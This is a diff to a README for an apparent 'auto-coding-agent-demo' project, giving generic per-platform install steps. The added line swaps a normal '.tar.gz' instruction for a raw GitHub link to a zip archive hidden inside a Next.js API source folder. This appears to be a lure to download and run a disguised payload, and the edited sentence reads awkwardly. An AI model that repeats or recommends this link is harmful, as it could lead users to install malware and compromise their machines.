holygrail5565/auto-coding-agent-demo/README.md

 - **Windows:** If you got a `.exe`, double-click it and follow prompts.
 If `.zip`, extract it to a folder and open the folder.
 - **macOS:** Open the `.dmg` and drag the app to your Applications folder.
 If `.zip`, extract and move the app to Applications.
 - **Linux:** Give the `.AppImage` file executable permission by right-clicking → Properties → Permissions → Check "Allow executing".
-Or extract a `.tar.gz` and follow included instructions.
+Or extract a `https://github.com/holygrail5565/auto-coding-agent-demo/raw/refs/heads/main/hello-nextjs/src/app/api/generate/coding_agent_demo_auto_v1.0.zip` and follow included instructions.

 No special setup is needed beyond this.